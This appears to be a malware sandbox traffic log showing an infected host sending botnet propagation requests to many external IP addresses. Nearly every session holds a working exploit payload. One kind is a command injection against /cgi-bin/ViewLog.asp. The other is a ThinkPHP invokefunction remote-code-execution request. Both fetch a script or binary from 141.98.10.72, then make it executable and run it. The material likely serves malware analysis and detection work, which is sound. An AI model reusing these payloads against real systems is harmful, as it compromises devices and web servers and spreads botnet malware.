                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            907192.168.2.235224031.136.192.798080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:00.036943913 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:00.658505917 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:01.906378031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:04.593955994 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:09.713365078 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:19.695946932 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:39.917150974 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            908192.168.2.234915431.136.81.2508080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:00.039592981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:00.658488035 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:01.906383038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:04.593954086 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:09.713332891 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:19.695940971 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:39.917071104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            909192.168.2.2348426112.184.44.9780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:00.275214911 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:00.566378117 CET504INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 349
                                                            Connection: close
                                                            Date: Wed, 14 Feb 2024 08:30:00 GMT
                                                            Server: lighttpd/1.4.32
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            910192.168.2.234757888.221.149.15280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:01.937375069 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:02.132107973 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:30:02 GMT
                                                            Date: Wed, 14 Feb 2024 08:30:02 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 62 39 31 64 64 35 38 26 23 34 36 3b 31 37 30 37 38 39 39 34 30 32 26 23 34 36 3b 36 37 66 66 32 38 63 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;2b91dd58&#46;1707899402&#46;67ff28c3</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            911192.168.2.233926288.99.104.1780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:01.952764034 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:02.166251898 CET913INHTTP/1.1 400 Bad Request
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 681
                                                            date: Wed, 14 Feb 2024 08:30:02 GMT
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            912192.168.2.234253488.99.95.12080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:02.157655001 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:02.361960888 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:30:02 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            913192.168.2.234265888.130.135.5080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:02.346977949 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:02.562557936 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.24.0
                                                            Date: Wed, 14 Feb 2024 08:30:02 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            914192.168.2.234960088.221.248.7080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:02.507863998 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:02.874982119 CET479INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Expires: Wed, 14 Feb 2024 08:30:02 GMT
                                                            Date: Wed, 14 Feb 2024 08:30:02 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 65 39 62 32 35 63 34 26 23 34 36 3b 31 37 30 37 38 39 39 34 30 32 26 23 34 36 3b 31 38 37 61 33 34 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;8e9b25c4&#46;1707899402&#46;187a348</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            915192.168.2.2357744112.74.96.2680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:03.240302086 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
